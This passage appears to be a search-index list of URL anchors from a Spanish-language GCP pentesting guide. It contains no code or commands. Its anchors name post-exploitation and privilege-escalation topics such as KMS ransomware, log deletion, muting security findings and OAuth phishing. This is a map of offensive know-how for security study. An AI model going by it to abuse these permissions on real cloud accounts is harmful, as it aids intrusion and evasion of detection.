testing-cloud/gcp-security/gcp-basic-information/index.html#jerarquía-de-recursos","pentesting-cloud/gcp-security/gcp-basic-information/index.html#migración-de-proyectos","pentesting-cloud/gcp-security/gcp-basic-information/index.html#políticas-de-organización","pentesting-cloud/gcp-security/gcp-basic-information/index.html#políticas-de-organización-predeterminadas","pentesting-cloud/gcp-security/gcp-basic-information/index.html#roles-de-iam","pentesting-cloud/gcp-security/gcp-basic-information/index.html#usuarios","pentesting-cloud/gcp-security/gcp-basic-information/index.html#grupos","pentesting-cloud/gcp-security/gcp-basic-information/index.html#política-de-contraseñas-predeterminada","pentesting-cloud/gcp-security/gcp-basic-information/index.html#cuentas-de-servicio","pentesting-cloud/gcp-security/gcp-basic-information/index.html#claves-y-tokens","pentesting-cloud/gcp-security/gcp-basic-information/index.html#alcances-de-acceso","pentesting-cloud/gcp-security/gcp-basic-information/index.html#políticas-vínculos-y-membresías-de-iam-en-terraform","pentesting-cloud/gcp-security/gcp-basic-information/index.html#referencias","pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.html#gcp---abuso-de-federación","pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.html#oidc---abuso-de-github-actions","pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.html#gcp","pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.html#github","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#gcp---permisos-para-un-pentest","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#permisos-de-herramientas-individuales","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#purplepanda","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#scoutsuite","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#cloudsploit","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#cartografía","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#starbase","pentesting-cloud/gcp-security/gcp-post-exploitation/index.html#gcp---post-explotación","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.html#gcp---app-engine-post-explotación","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.html#app-engine","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.html#appenginememcacheaddkey--appenginememcachelist--appenginememcachegetkey--appenginememcacheflush","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.html#loggingviewsaccess","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.html#leer-código-fuente","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.html#modificar-código-fuente","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.html#gcp---post-explotación-del-registro-de-artefactos","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.html#registro-de-artefactos","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.html#privesc","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.html#gcp---post-explotación-de-cloud-build","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.html#cloud-build","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.html#cloudbuildbuildsapprove","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.html#gcp---explotación-posterior-de-cloud-functions","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.html#cloud-functions","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.html#cloudfunctionsfunctionssourcecodeget","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.html#robar-solicitudes-de-funciones-en-la-nube","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.html#gcp---cloud-run-post-explotación","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.html#cloud-run","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.html#acceder-a-las-imágenes","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.html#modificar-y-redeplegar-la-imagen","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.html#gcp---cloud-shell-post-explotación","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.html#cloud-shell","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.html#escape-de-contenedor","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.html#Úsalo-como-proxy","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#gcp---cloud-sql-post-explotación","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloud-sql","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqlinstancesupdate--cloudsqlinstancesget","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqluserslist","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqluserscreate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqlusersupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqlinstancesrestorebackup-cloudsqlbackuprunsget","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqlbackuprunsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqlinstancesexport-storageobjectscreate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqlinstancesimport-storageobjectsget","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqldatabasesdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.html#gcp---compute-post-explotación","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.html#compute","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.html#exportar-e-inspeccionar-imágenes-localmente","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.html#exportar-e-inspeccionar-instantáneas-y-discos-localmente","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.html#inspeccionar-una-imagen-creando-una-vm","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.html#inspeccionar-un-snapshotdisk-adjuntándolo-a-una-vm","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.html#gcp---filestore-post-explotación","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.html#filestore","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.html#montar-filestore","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.html#eliminar-restricciones-y-obtener-permisos-adicionales","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.html#restaurar-una-copia-de-seguridad","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.html#crear-una-copia-de-seguridad-y-restaurarla","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.html#gcp---iam-post-explotación","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.html#iam","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.html#conceder-acceso-a-la-consola-de-administración","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#gcp---kms-post-explotación","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#kms","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#cloudkmscryptokeyversionsdestroy","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#kms-ransomware","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#cloudkmscryptokeyversionsusetoencrypt--cloudkmscryptokeyversionsusetoencryptviadelegation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#cloudkmscryptokeyversionsusetosign","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#cloudkmscryptokeyversionsusetoverify","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#gcp---registro-post-explotación","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#información-básica","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#registro-predeterminado","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#agregar-principal-excluido","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#leer-registros---logginglogentrieslist","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#logginglogsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#escribir-registros---logginglogentriescreate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#loggingbucketsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#loggingbucketsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#logginglinksdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#loggingviewsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#loggingviewsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#logginglogmetricsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#logginglogmetricsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#loggingsinksdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#loggingsinksupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#gcp---monitoreo-post-explotación","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoreo","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringalertpoliciesdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringalertpoliciesupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringdashboardsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringdashboardsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringsnoozescreate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringsnoozesupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringnotificationchannelsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringnotificationchannelsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#gcp---pubsub-post-explotación","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsub","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubtopicspublish","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubtopicsdetachsubscription","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubtopicsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubtopicsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubtopicssetiampolicy","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubsubscriptionscreate-pubsubtopicsattachsubscription--pubsubsubscriptionsconsume","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubsubscriptionsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubsubscriptionsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubsubscriptionssetiampolicy","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubschemasattach-pubsubtopicsupdatepubsubschemascreate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubschemasdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubschemassetiampolicy","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubsnapshotscreate-pubsubsnapshotsseek","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.html#gcp---secretmanager-post-explotación","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.html#secretmanager","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.html#secretmanagerversionsaccess","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#gcp---seguridad-post-explotación","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#seguridad","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#securitycentermuteconfigscreate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#securitycentermuteconfigsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#securitycenterfindingsbulkmuteupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#securitycenterfindingssetmute","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#securitycenterfindingsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.html#gcp---flujos-de-trabajo-post-explotación","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.html#flujo-de-trabajo","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.html#post-explotación","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.html#gcp---almacenamiento-post-explotación","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.html#almacenamiento-en-la-nube","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.html#dar-acceso-público","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#gcp---escalación-de-privilegios","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#introducción-a-la-escalación-de-privilegios-en-gcp","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#permisos-para-la-metodología-de-escalación-de-privilegios","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#eludir-los-alcances-de-acceso","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#técnicas-de-escalación-de-privilegios","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#abusando-de-gcp-para-escalar-privilegios-localmente","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#referencias","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#gcp---apikeys-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#apikeys","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#acceso-a-clave-api-por-fuerza-bruta","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#apikeyskeyscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#apikeyskeysgetkeystring--apikeyskeyslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#apikeyskeysundelete--apikeyskeyslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#crear-una-aplicación-interna-de-oauth-para-phishing-a-otros-trabajadores","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#gcp---appengine-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#app-engine","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#appengineapplicationsget-appengineinstancesget-appengineinstanceslist-appengineoperationsget-appengineoperationslist-appengineservicesget-appengineserviceslist-appengineversionscreate-appengineversionsget-appengineversionslist-cloudbuildbuildsgetiamserviceaccountsactas-resourcemanagerprojectsget-storageobjectscreate-storageobjectslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#actualizar-permisos-equivalentes","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#appengineinstancesenabledebug-appengineinstancesget-appengineinstanceslist-appengineoperationsget-appengineservicesget-appengineserviceslist-appengineversionsget-appengineversionslist-computeprojectsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#appengineapplicationsupdate-appengineoperationsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#appengineversionsgetfilecontents-appengineversionsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#acceso-de-escritura-sobre-los-buckets","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#acceso-de-escritura-sobre-el-registro-de-artefactos","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.html#gcp---artifact-registry-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.html#artifact-registry","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.html#artifactregistryrepositoriesuploadartifacts","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.html#gcp---batch-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.html#batch","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.html#batchjobscreate-iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#gcp---bigquery-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#bigquery","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#leer-tabla","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#exportar-datos","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#insertar-datos","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#bigquerydatasetssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#bigquerydatasetsupdate-bigquerydatasetsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#bigquerytablessetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#bigqueryrowaccesspoliciesupdate-bigqueryrowaccesspoliciessetiampolicy-bigquerytablesgetdata-bigqueryjobscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.html#gcp---clientauthconfig-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.html#crear-marca-y-cliente-oauth","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#gcp---cloudbuild-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#cloudbuild","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#cloudbuildbuildscreate-iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#cloudbuildbuildsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#cloudbuildrepositoriesaccessreadtoken","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#cloudbuildrepositoriesaccessreadwritetoken","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#cloudbuildconnectionsfetchlinkablerepositories","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#gcp---cloudfunctions-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#cloudfunctions","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#cloudfunctionsfunctionscreate--cloudfunctionsfunctionssourcecodeset---iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#cloudfunctionsfunctionsupdate--cloudfunctionsfunctionssourcecodeset---iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#cloudfunctionsfunctionssourcecodeset","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#cloudfunctionsfunctionssetiampolicy-iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#cloudfunctionsfunctionsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#acceso-de-lectura-y-escritura-sobre-el-bucket","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#acceso-de-lectura-y-escritura-sobre-el-registro-de-artefactos","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#referencias","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.html#gcp---cloudidentity-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.html#cloudidentity","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.html#agregarte-a-un-grupo","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.html#modificar-la-membresía-del-grupo","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.html#gcp---cloud-scheduler-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.html#cloud-scheduler","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.html#cloudschedulerjobscreate-iamserviceaccountsactas-cloudschedulerlocationslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.html#cloudschedulerjobsupdate-iamserviceaccountsactas-cloudschedulerlocationslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.html#referencias","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#gcp---compute-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#compute","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computeprojectssetcommoninstancemetadata","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computeinstancessetmetadata","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computeinstancessetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computeinstancesoslogin","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computeinstancesosadminlogin","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computeinstancescreateiamserviceaccountsactas-computediskscreate-computeinstancescreate-computeinstancessetmetadata-computeinstancessetserviceaccount-computesubnetworksuse-computesubnetworksuseexternalip","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#osconfigpatchdeploymentscreate--osconfigpatchjobsexec","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computemachineimagessetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computesnapshotssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computediskssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#bypass-access-scopes","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#local-privilege-escalation-in-gcp-compute-instance","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#references","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.html#gcp---agregar-metadatos-ssh-personalizados","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.html#gcp---agregar-metadatos-ssh-personalizados-1","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.html#modificación-de-los-metadatos","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.html#referencias","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#gcp---composer-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#composer","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#composerenvironmentscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#composerenvironmentsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#descargar-dags","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#importar-dags","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#acceso-de-escritura-al-bucket-de-composer","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#importar-plugins","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#importar-datos","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#gcp---container-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#container","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containerclustersget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containerrolesescalate--containerclusterrolesescalate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containerrolesbind--containerclusterrolesbind","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containercronjobscreate--containercronjobsupdate--containerdaemonsetscreate--containerdaemonsetsupdate--containerdeploymentscreate--containerdeploymentsupdate--containerjobscreate--containerjobsupdate--containerpodscreate--containerpodsupdate--containerreplicasetscreate--containerreplicasetsupdate--containerreplicationcontrollerscreate--containerreplicationcontrollersupdate--containerscheduledjobscreate--containerscheduledjobsupdate--containerstatefulsetscreate--containerstatefulsetsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containersecretsget--containersecretslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containerpodsexec","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containerpodsportforward","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containerserviceaccountscreatetoken","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containermutatingwebhookconfigurationscreate--containermutatingwebhookconfigurationsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.html#gcp-dataproc-privilege-escalation","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.html#dataproc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.html#dataprocclustersget-dataprocclustersuse-dataprocjobscreate-dataprocjobsget-dataprocjobslist-storageobjectscreate-storageobjectsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.html#gcp---privesc-de-deploymentmanager","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.html#deploymentmanager","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.html#deploymentmanagerdeploymentscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.html#deploymentmanagerdeploymentsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.html#deploymentmanagerdeploymentssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.html#referencias","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#gcp---iam-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iam","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamrolesupdate-iamrolesget","pentesting-cloud/gcp-security/gcp-privilege-e